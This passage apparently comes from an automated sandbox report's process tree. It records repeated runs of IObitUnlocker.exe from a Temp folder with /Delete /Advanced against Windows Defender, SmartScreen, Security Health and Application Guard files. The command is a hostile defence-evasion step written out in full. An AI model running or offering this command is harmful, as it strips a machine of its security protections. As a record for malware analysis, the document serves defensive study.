                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                              10⤵
                                                                                PID:1632
                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                10⤵
                                                                                  PID:5084
                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                  10⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1012
                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                  10⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5700
                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                  10⤵
                                                                                    PID:5952
                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                    10⤵
                                                                                      PID:1628
                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                      10⤵
                                                                                        PID:5624
                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                        10⤵
                                                                                          PID:5592
                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                          10⤵
                                                                                            PID:276
                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                            10⤵
                                                                                              PID:5668
                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                              10⤵
                                                                                                PID:2376
                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
